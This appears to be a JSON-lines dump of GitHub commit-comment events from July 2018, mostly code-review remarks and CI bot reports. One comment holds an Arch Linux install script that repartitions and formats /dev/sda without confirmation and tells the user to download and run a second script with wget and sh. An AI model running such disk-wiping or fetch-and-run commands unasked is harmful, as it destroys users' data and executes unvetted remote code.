{"id":"7967506299","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29713195,"position":null,"line":null,"path":null,"commit_id":"3637b1b031c13f02b440a1dcc13e9477b50dadf3","created_at":"2018-07-15T15:07:48Z","updated_at":"2018-07-15T15:07:48Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.339`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/404148044) :tada:"}},"created_at":"2018-07-15T15:07:48Z"}
{"id":"7967509187","type":"CommitCommentEvent","actor":{"login":"mcd500"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29713205,"position":null,"line":null,"path":null,"commit_id":"f9b349877c2b5f8b825838e61c34e8ece37ca773","created_at":"2018-07-15T15:10:12Z","updated_at":"2018-07-15T15:10:12Z","author_association":"CONTRIBUTOR","body":"This fixes #123."}},"created_at":"2018-07-15T15:10:12Z"}
{"id":"7967511993","type":"CommitCommentEvent","actor":{"login":"Fagneregomes"},"repo":{"name":"Fagneregomes/exercicios_react"},"payload":{"comment":{"id":29713210,"position":null,"line":null,"path":null,"commit_id":"b7545ca8d9a22488c37e6bf05499320f422eadad","created_at":"2018-07-15T15:12:22Z","updated_at":"2018-07-15T15:12:22Z","author_association":"OWNER","body":"O parâmetro -y executa o comando sem a necessidade de preencher os dados. Se omiti-lo será necessário preencher todos campos."}},"created_at":"2018-07-15T15:12:22Z"}
{"id":"7967512075","type":"CommitCommentEvent","actor":{"login":"lindhe"},"repo":{"name":"lindhe/dotfiles"},"payload":{"comment":{"id":29713211,"position":null,"line":null,"path":null,"commit_id":"de2371cbeacb1c6d7fb36a1f6d09b36197182fd6","created_at":"2018-07-15T15:12:26Z","updated_at":"2018-07-15T15:12:26Z","author_association":"OWNER","body":"@erikthorsell som en schmäck. Se även d7faf93"}},"created_at":"2018-07-15T15:12:26Z"}
{"id":"7967512331","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/mod-vas-autobalance"},"payload":{"comment":{"id":29713212,"position":null,"line":null,"path":null,"commit_id":"f2233423fc38ccaec5ebaa9807c7aadc2af8a0f5","created_at":"2018-07-15T15:12:40Z","updated_at":"2018-07-15T15:12:40Z","author_association":"MEMBER","body":"wtf is that"}},"created_at":"2018-07-15T15:12:40Z"}
{"id":"7967512858","type":"CommitCommentEvent","actor":{"login":"Dail-Jonker"},"repo":{"name":"dolan212/devs101"},"payload":{"comment":{"id":29713213,"position":null,"line":null,"path":null,"commit_id":"fc9f29536bd089781863a325cc199a586a0857d0","created_at":"2018-07-15T15:13:05Z","updated_at":"2018-07-15T15:13:05Z","author_association":"COLLABORATOR","body":"The hotkeys only seem to work when the button is pressed first."}},"created_at":"2018-07-15T15:13:05Z"}
{"id":"7967516181","type":"CommitCommentEvent","actor":{"login":"smalex86"},"repo":{"name":"smalex86/logger"},"payload":{"comment":{"id":29713218,"position":null,"line":null,"path":null,"commit_id":"cb58be9de5125004ad0b1357a5b4df30525705fd","created_at":"2018-07-15T15:15:36Z","updated_at":"2018-07-15T15:15:36Z","author_association":"OWNER","body":"Issue #6 - Caching mechanism for file logging"}},"created_at":"2018-07-15T15:15:36Z"}
{"id":"7967517345","type":"CommitCommentEvent","actor":{"login":"oleksalab"},"repo":{"name":"oleksalab/java-start"},"payload":{"comment":{"id":29713219,"position":null,"line":null,"path":null,"commit_id":"1f196adf1928ecf0bf169498a18369f9f17c2e69","created_at":"2018-07-15T15:16:31Z","updated_at":"2018-07-15T15:16:31Z","author_association":"OWNER","body":"файл запаролен"}},"created_at":"2018-07-15T15:16:31Z"}
{"id":"7967518377","type":"CommitCommentEvent","actor":{"login":"manucorporat"},"repo":{"name":"ionic-team/stencil"},"payload":{"comment":{"id":29713220,"position":19,"line":42,"path":"src/renderer/vdom/set-accessor.ts","commit_id":"f1ea5b0dfe467da336a1f7471c40cb79b5280604","created_at":"2018-07-15T15:17:21Z","updated_at":"2018-07-15T15:17:21Z","author_association":"MEMBER","body":"could we use include() here? compiling and running a regex for every single loop is crazy, i am not sure V8 apply move the loop-invariant code ourside the loop (the compilation)"}},"created_at":"2018-07-15T15:17:21Z"}
{"id":"7967518792","type":"CommitCommentEvent","actor":{"login":"manucorporat"},"repo":{"name":"ionic-team/stencil"},"payload":{"comment":{"id":29713221,"position":19,"line":42,"path":"src/renderer/vdom/set-accessor.ts","commit_id":"f1ea5b0dfe467da336a1f7471c40cb79b5280604","created_at":"2018-07-15T15:17:41Z","updated_at":"2018-07-15T15:17:41Z","author_association":"MEMBER","body":"cc @adamdbradley "}},"created_at":"2018-07-15T15:17:41Z"}
{"id":"7967531515","type":"CommitCommentEvent","actor":{"login":"Raiv"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713248,"position":5,"line":12,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/repository/UserRepository.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T15:29:00Z","updated_at":"2018-07-15T15:29:00Z","author_association":"COLLABORATOR","body":"\"org1\", \"Org1MSP\""}},"created_at":"2018-07-15T15:29:00Z"}
{"id":"7967531541","type":"CommitCommentEvent","actor":{"login":"DeVini"},"repo":{"name":"DeVini/ExerciciosPhp"},"payload":{"comment":{"id":29713249,"position":null,"line":null,"path":null,"commit_id":"567bb5bde50a7661e1fe3eb316526ef509f3c528","created_at":"2018-07-15T15:29:01Z","updated_at":"2018-07-15T15:29:01Z","author_association":"OWNER","body":"Esse commit vai implementar o método textWrap da classe Resolução"}},"created_at":"2018-07-15T15:29:01Z"}
{"id":"7967533460","type":"CommitCommentEvent","actor":{"login":"carund"},"repo":{"name":"carund/linux-1.sh"},"payload":{"comment":{"id":29713254,"position":null,"line":null,"path":null,"commit_id":"2f871ee162705d513097f0f8b581810220ccc77c","created_at":"2018-07-15T15:30:42Z","updated_at":"2018-07-15T15:30:42Z","author_association":"OWNER","body":"#!/bin/bash\r\n\r\nloadkeys ru\r\nsetfont cyr-sun16\r\necho 'Скрипт сделан на основе чеклиста эдгара я по Установке ArchLinux'\r\necho 'Ссылка на чек лист есть в группе vk.com/arch4u'\r\n\r\necho '2.3 Синхронизация системных часов'\r\ntimedatectl set-ntp true\r\n\r\necho '2.4 создание разделов'\r\n(\r\n  echo o;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +100M;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +20G;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +1024M;\r\n\r\n  echo n;\r\n  echo p;\r\n  echo;\r\n  echo;\r\n  echo a;\r\n  echo 1;\r\n\r\n  echo w;\r\n) | fdisk /dev/sda\r\n\r\necho 'Ваша разметка диска'\r\nfdisk -l\r\n\r\necho '2.4.2 Форматирование дисков'\r\nmkfs.ext2  /dev/sda1 -L boot\r\nmkfs.ext4  /dev/sda2 -L root\r\nmkswap /dev/sda3 -L swap\r\nmkfs.ext4  /dev/sda4 -L home\r\n\r\necho '2.4.3 Монтирование дисков'\r\nmount /dev/sda2 /mnt\r\nmkdir /mnt/{boot,home}\r\nmount /dev/sda1 /mnt/boot\r\nswapon /dev/sda3\r\nmount /dev/sda4 /mnt/home\r\n\r\necho '3.1 Выбор зеркал для загрузки. Ставим зеркало от Яндекс'\r\necho \"Server = http://mirror.yandex.ru/archlinux/\\$repo/os/\\$arch\" > /etc/pacman.d/mirrorlist\r\n\r\necho '3.2 Установка основных пакетов'\r\npacstrap /mnt base base-devel\r\n\r\necho '3.3 Настройка системы'\r\ngenfstab -pU /mnt >> /mnt/etc/fstab\r\n\r\necho 'Переходим в установлнную систему.'\r\necho '1) Установите wget, командой: pacman -S wget'\r\necho '2) Скачайте вторую часть скрипта командой: wget ordanax.ru/arch/arch_2.sh'\r\necho '3) Запустите скрипт командой: sh arch_2.sh'\r\narch-chroot /mnt"}},"created_at":"2018-07-15T15:30:42Z"}
{"id":"7967534264","type":"CommitCommentEvent","actor":{"login":"Raiv"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713255,"position":62,"line":57,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/userLoader/UserDetailsLoader.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T15:31:25Z","updated_at":"2018-07-15T15:31:25Z","author_association":"COLLABORATOR","body":"админ вообще не должен пересоздаваться. по крайней мере гиперледжерский. но да ладно, пока так"}},"created_at":"2018-07-15T15:31:25Z"}
{"id":"7967535627","type":"CommitCommentEvent","actor":{"login":"dbdii407"},"repo":{"name":"zjhiphop/optimize"},"payload":{"comment":{"id":29713257,"position":5,"line":6,"path":"package.json","commit_id":"ef828123e51bbcee78feb184bd3732513b719a9d","created_at":"2018-07-15T15:32:42Z","updated_at":"2018-07-15T15:32:42Z","author_association":"NONE","body":"\"linux\" ?\r\nCan't install on anything that's not Ubuntu??!"}},"created_at":"2018-07-15T15:32:42Z"}
{"id":"7967536262","type":"CommitCommentEvent","actor":{"login":"dengchao-ryan"},"repo":{"name":"dengchao-ryan/AngularLean"},"payload":{"comment":{"id":29713258,"position":null,"line":null,"path":null,"commit_id":"8f92bd6f21320698ecc9a24f24fb9f56063fb736","created_at":"2018-07-15T15:33:16Z","updated_at":"2018-07-15T15:33:16Z","author_association":"OWNER","body":"无法通信是因为没有配置实际的AP服务器"}},"created_at":"2018-07-15T15:33:16Z"}
{"id":"7967536599","type":"CommitCommentEvent","actor":{"login":"adamdbradley"},"repo":{"name":"ionic-team/stencil"},"payload":{"comment":{"id":29713259,"position":19,"line":42,"path":"src/renderer/vdom/set-accessor.ts","commit_id":"f1ea5b0dfe467da336a1f7471c40cb79b5280604","created_at":"2018-07-15T15:33:34Z","updated_at":"2018-07-15T15:33:34Z","author_association":"MEMBER","body":"Whatever is faster, let's do that."}},"created_at":"2018-07-15T15:33:34Z"}
{"id":"7967536831","type":"CommitCommentEvent","actor":{"login":"Eliminater"},"repo":{"name":"SugaMod/op6_kernel"},"payload":{"comment":{"id":29713262,"position":null,"line":null,"path":null,"commit_id":"b4daa6be4d0c0c6554037a1294ffb3a902ced3b8","created_at":"2018-07-15T15:33:45Z","updated_at":"2018-07-15T15:33:45Z","author_association":"NONE","body":"😂😂🤔"}},"created_at":"2018-07-15T15:33:45Z"}
{"id":"7967536881","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29713263,"position":null,"line":null,"path":null,"commit_id":"329d8993eb5fffc3ed3122513b86b9004606c843","created_at":"2018-07-15T15:33:48Z","updated_at":"2018-07-15T15:33:48Z","author_association":"CONTRIBUTOR","body":"Genial @mora145 , solo que si no te molesta buscare otro termino para ''Cuido''"}},"created_at":"2018-07-15T15:33:48Z"}
{"id":"7967538123","type":"CommitCommentEvent","actor":{"login":"danielballan"},"repo":{"name":"scikit-beam/rixs"},"payload":{"comment":{"id":29713267,"position":null,"line":null,"path":null,"commit_id":"6180b623e3a8af5340d4a96cafae34c1aaff74d6","created_at":"2018-07-15T15:34:53Z","updated_at":"2018-07-15T15:34:53Z","author_association":"MEMBER","body":">  keeping it simple will be nice and should help in stopping the entry barrier in understanding and developing the code from getting too high.\r\n\r\nThat's reasonable. As a data point, numpy recently adopted the same testing framework that we use (pytest) and made a policy decision to not to use fixtures because they are too \"magical\". They have their uses, but declaring them a bridge too far for rixs would be fine by me."}},"created_at":"2018-07-15T15:34:53Z"}
{"id":"7967538731","type":"CommitCommentEvent","actor":{"login":"brettwooldridge"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29713268,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-15T15:35:25Z","updated_at":"2018-07-15T15:35:25Z","author_association":"OWNER","body":"It looks like [shippable.com](http://shippable.com) offers [free ARM64 builds](http://docs.shippable.com/platform/tutorial/workflow/run-ci-builds-on-arm/) for open source projects, similar to travis-ci.  I'll try to set this up in the next day or two.\r\n"}},"created_at":"2018-07-15T15:35:25Z"}
{"id":"7967545105","type":"CommitCommentEvent","actor":{"login":"LnL7"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29713270,"position":null,"line":null,"path":null,"commit_id":"8f2832a5d79838bcf7c2152179590f21c793c9d6","created_at":"2018-07-15T15:41:13Z","updated_at":"2018-07-15T15:41:13Z","author_association":"NONE","body":"Ah, I thought this was in nixpkgs already."}},"created_at":"2018-07-15T15:41:13Z"}
{"id":"7967550236","type":"CommitCommentEvent","actor":{"login":"HulkLe"},"repo":{"name":"StevenKin/ZhihuQuestionsSpider"},"payload":{"comment":{"id":29713276,"position":null,"line":null,"path":null,"commit_id":"344babcf27910764dabd9b2b8d533dea3c5dd860","created_at":"2018-07-15T15:45:00Z","updated_at":"2018-07-15T15:45:00Z","author_association":"NONE","body":"至少函数干了什么给点注释吧"}},"created_at":"2018-07-15T15:45:00Z"}
{"id":"7967553887","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"w3c/csswg-drafts"},"payload":{"comment":{"id":29713282,"position":4,"line":338,"path":"css-fonts-3/Fonts.src.html","commit_id":"951fc349f63ce196e3f9b4f4a0213db6e76b1f10","created_at":"2018-07-15T15:48:07Z","updated_at":"2018-07-15T15:48:07Z","author_association":"CONTRIBUTOR","body":"Thanks for the edits. However, Fonts 3 is in a brief mandatory CR before moving immediately to PR so this change should instead be held over as an erratum to the Fonts 3 REC."}},"created_at":"2018-07-15T15:48:07Z"}
{"id":"7967555712","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29713283,"position":null,"line":null,"path":null,"commit_id":"95faa9a3e198435d4982273370ba8b83a54e8629","created_at":"2018-07-15T15:49:39Z","updated_at":"2018-07-15T15:49:39Z","author_association":"COLLABORATOR","body":"Puzzle `857-34fbb536` discovered in   [`src/main/java/ru/mystamps/web/controller/dto/ImportSellerForm.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/controller/dto/ImportSellerForm.java)   and submitted as #918. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-15T15:49:39Z"}
{"id":"7967555945","type":"CommitCommentEvent","actor":{"login":"paluh"},"repo":{"name":"khanage/purescript-indexed-monad"},"payload":{"comment":{"id":29713285,"position":null,"line":null,"path":null,"commit_id":"cf105603868fddc2bcc8eb14778aa8645599929f","created_at":"2018-07-15T15:49:51Z","updated_at":"2018-07-15T15:49:51Z","author_association":"NONE","body":"Hi,\r\n\r\nThanks for this update. I want to use your branch (until your PR is merged) and I wonder why did you remove `bower.json` from this library?"}},"created_at":"2018-07-15T15:49:51Z"}
{"id":"7967556636","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713286,"position":null,"line":null,"path":null,"commit_id":"b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c","created_at":"2018-07-15T15:50:28Z","updated_at":"2018-07-15T15:50:28Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2942 of 2943 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b9070c7674aec2d2e2a0803f92a2c34e5b4cee6c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-15T15:50:28Z"}
{"id":"7967556980","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29713287,"position":null,"line":null,"path":null,"commit_id":"95faa9a3e198435d4982273370ba8b83a54e8629","created_at":"2018-07-15T15:50:43Z","updated_at":"2018-07-15T15:50:43Z","author_association":"COLLABORATOR","body":"Puzzle `857-aa59724c` discovered in   [`src/main/java/ru/mystamps/web/controller/dto/ImportSellerForm.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/controller/dto/ImportSellerForm.java)   and submitted as #919. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-15T15:50:43Z"}
{"id":"7967558877","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713295,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-15T15:52:18Z","updated_at":"2018-07-15T15:52:18Z","author_association":"NONE","body":"#6517-MissingEquationReference (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2980 of 2980 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T15:52:18Z"}
{"id":"7967559180","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29713296,"position":null,"line":null,"path":null,"commit_id":"95faa9a3e198435d4982273370ba8b83a54e8629","created_at":"2018-07-15T15:52:32Z","updated_at":"2018-07-15T15:52:32Z","author_association":"COLLABORATOR","body":"Puzzle `857-16517a02` discovered in   [`src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java)   and submitted as #920. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-15T15:52:32Z"}
{"id":"7967562256","type":"CommitCommentEvent","actor":{"login":"dizhizhou"},"repo":{"name":"DvdMgr/sem"},"payload":{"comment":{"id":29713297,"position":5,"line":20,"path":"sem/utils.py","commit_id":"705789a07d543bf23624831f56628cee62947909","created_at":"2018-07-15T15:54:30Z","updated_at":"2018-07-15T15:54:30Z","author_association":"COLLABORATOR","body":"lists -> listed"}},"created_at":"2018-07-15T15:54:30Z"}
{"id":"7967563364","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713299,"position":5,"line":66,"path":"ControlPanelDynamic/pom.xml","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T15:55:13Z","updated_at":"2018-07-15T15:55:13Z","author_association":"NONE","body":"Для того, чтобы в случае чего версия транзитивно не передавалась. Можно ещё скоуп выставить, как provided\r\nhttps://github.com/deeplearning4j/deeplearning4j/issues/4839\r\nНе знаю, почему я не остановился на втором варианте."}},"created_at":"2018-07-15T15:55:13Z"}
{"id":"7967564395","type":"CommitCommentEvent","actor":{"login":"dylanwilbur"},"repo":{"name":"dylanwilbur/seven-ll"},"payload":{"comment":{"id":29713301,"position":null,"line":null,"path":null,"commit_id":"0e373824013604258b18296f99f555cd1405adbf","created_at":"2018-07-15T15:56:00Z","updated_at":"2018-07-15T15:56:00Z","author_association":"OWNER","body":"Changes to `nav-animation.js` removes invisibility from other pages, but adds small bug that loads a dark background momentarily before becoming transparent."}},"created_at":"2018-07-15T15:56:00Z"}
{"id":"7967565050","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29713302,"position":null,"line":null,"path":null,"commit_id":"95faa9a3e198435d4982273370ba8b83a54e8629","created_at":"2018-07-15T15:56:31Z","updated_at":"2018-07-15T15:56:31Z","author_association":"COLLABORATOR","body":"Puzzle `857-cbb24247` discovered in   [`src/main/java/ru/mystamps/web/service/TransactionParticipantServiceImpl.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/TransactionParticipantServiceImpl.java)   and submitted as #921. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-15T15:56:31Z"}
{"id":"7967565919","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713304,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-15T15:57:13Z","updated_at":"2018-07-15T15:57:13Z","author_association":"NONE","body":"#6517-MissingEquationReference (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T15:57:13Z"}
{"id":"7967565993","type":"CommitCommentEvent","actor":{"login":"marcoscarvalho"},"repo":{"name":"marcoscarvalho/promocuritiba"},"payload":{"comment":{"id":29713305,"position":null,"line":null,"path":null,"commit_id":"6941e42baa8290502a11754e9d487ae70f26ffe0","created_at":"2018-07-15T15:57:16Z","updated_at":"2018-07-15T15:57:16Z","author_association":"OWNER","body":"Verdade, vou diminuir agora os commits com tanta coisa. Só ajustando a estrutura né."}},"created_at":"2018-07-15T15:57:16Z"}
{"id":"7967567925","type":"CommitCommentEvent","actor":{"login":"MichalOrlowski"},"repo":{"name":"lucyivy/sudoku_game"},"payload":{"comment":{"id":29713307,"position":56,"line":56,"path":"kodilla-sudoku-game/src/main/java/ElementValidator.java","commit_id":"caff69f8387b2bd3d81b96a4b5d1ccae7bfd912c","created_at":"2018-07-15T15:58:44Z","updated_at":"2018-07-15T15:58:44Z","author_association":"NONE","body":"Metoda wymaga jeszcze dalszej optymalizacji"}},"created_at":"2018-07-15T15:58:44Z"}
{"id":"7967569324","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713314,"position":68,"line":76,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/entities/User.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T15:59:41Z","updated_at":"2018-07-15T15:59:41Z","author_association":"NONE","body":"Лучше использовать геттер.\r\n1) Единообразно\r\n2) Не на 100% уверен, что есть notnull-гарантии"}},"created_at":"2018-07-15T15:59:41Z"}
{"id":"7967569928","type":"CommitCommentEvent","actor":{"login":"MichalOrlowski"},"repo":{"name":"lucyivy/sudoku_game"},"payload":{"comment":{"id":29713318,"position":51,"line":51,"path":"kodilla-sudoku-game/src/main/java/ElementValidator.java","commit_id":"caff69f8387b2bd3d81b96a4b5d1ccae7bfd912c","created_at":"2018-07-15T16:00:07Z","updated_at":"2018-07-15T16:00:07Z","author_association":"NONE","body":"`return sudokuBoard.getBoard().get(rowToCheck).getRow().get(columnToCheck).getValue()==elemntValue`\r\n\r\nwystarczy"}},"created_at":"2018-07-15T16:00:07Z"}
{"id":"7967569931","type":"CommitCommentEvent","actor":{"login":"bnjmacdonald"},"repo":{"name":"bnjmacdonald/hansardparser"},"payload":{"comment":{"id":29713319,"position":null,"line":null,"path":null,"commit_id":"1b89378330d9e1d34a29731f7675f9d439208100","created_at":"2018-07-15T16:00:07Z","updated_at":"2018-07-15T16:00:07Z","author_association":"OWNER","body":"test_TxtParser shouldn't have been pushed with this commit. These tests are incomplete and need to be refactored to work with the new TxtParser format."}},"created_at":"2018-07-15T16:00:07Z"}
{"id":"7967570545","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713325,"position":81,"line":89,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/entities/User.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:00:24Z","updated_at":"2018-07-15T16:00:24Z","author_association":"NONE","body":"Лучше использовать геттер, т.к. не уверен, что есть notNull-гарантии"}},"created_at":"2018-07-15T16:00:24Z"}
{"id":"7967573860","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29713331,"position":null,"line":null,"path":null,"commit_id":"95faa9a3e198435d4982273370ba8b83a54e8629","created_at":"2018-07-15T16:02:34Z","updated_at":"2018-07-15T16:02:34Z","author_association":"COLLABORATOR","body":"Puzzle `857-83098214` discovered in   [`src/main/java/ru/mystamps/web/service/TransactionParticipantServiceImpl.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/TransactionParticipantServiceImpl.java)   and submitted as #922. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-15T16:02:34Z"}
{"id":"7967575299","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713333,"position":36,"line":36,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/hl/HLEnrollment.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:03:45Z","updated_at":"2018-07-15T16:03:45Z","author_association":"NONE","body":"npe-prone?"}},"created_at":"2018-07-15T16:03:45Z"}
{"id":"7967575489","type":"CommitCommentEvent","actor":{"login":"StanleySweet"},"repo":{"name":"0ADMods/terra_magna"},"payload":{"comment":{"id":29713335,"position":null,"line":null,"path":null,"commit_id":"599433ac7bfbdc3b87b776b4d8cfc0f24fc19376","created_at":"2018-07-15T16:03:54Z","updated_at":"2018-07-15T16:03:54Z","author_association":"CONTRIBUTOR","body":"Thanks for the report I'll fix the corral. For the rest though I'm no gameplay expert.."}},"created_at":"2018-07-15T16:03:54Z"}
{"id":"7967578224","type":"CommitCommentEvent","actor":{"login":"splintah"},"repo":{"name":"splintah/game-of-life"},"payload":{"comment":{"id":29713340,"position":null,"line":null,"path":null,"commit_id":"46080ad50c88820a8d7462fa38055ba274f2e194","created_at":"2018-07-15T16:05:55Z","updated_at":"2018-07-15T16:05:55Z","author_association":"OWNER","body":"I don't think this is a good idea. **Only** if the rule is formatted the same in every file format implemented, this may be done in my opinion.\r\nIf that is true (I believe it is, but don't know for sure), I'd rather `impl Display for Rule`."}},"created_at":"2018-07-15T16:05:55Z"}
{"id":"7967580943","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713349,"position":54,"line":71,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/repository/SpringDataUserRepositoryProxy.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:08:03Z","updated_at":"2018-07-15T16:08:03Z","author_association":"NONE","body":"Это сильное предположение. Предлагаю ловить более конкретные ошибки."}},"created_at":"2018-07-15T16:08:03Z"}
{"id":"7967580989","type":"CommitCommentEvent","actor":{"login":"tomty89"},"repo":{"name":"termux/termux-packages"},"payload":{"comment":{"id":29713350,"position":null,"line":null,"path":null,"commit_id":"072781ed1c378ab6d4b7c81dfba4260af8838c69","created_at":"2018-07-15T16:08:07Z","updated_at":"2018-07-15T16:08:07Z","author_association":"CONTRIBUTOR","body":"Sorry I have zero experience with texinfo. The bottom line is gawk ships a `awk` symlink as well, so that when it is installed `texindex` will use it instead of the busybox awk.\r\n\r\nI don't suppose it specifically requires gawk anyway, otherwise it would have hardcoded it, no? It's another story if busybox awk is simply flawed/broken."}},"created_at":"2018-07-15T16:08:07Z"}
{"id":"7967582930","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29713353,"position":56,"line":73,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/repository/SpringDataUserRepositoryProxy.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T16:09:48Z","updated_at":"2018-07-15T16:09:48Z","author_association":"NONE","body":"Ну надо что-то с этим сделать\r\nМне кажется, идеально будет здесь в случае неудачи с добавлением юзера в леджер оборачивать ошибку в какой-нибудь LedgerException и пробрасывать дальше.\r\n"}},"created_at":"2018-07-15T16:09:48Z"}
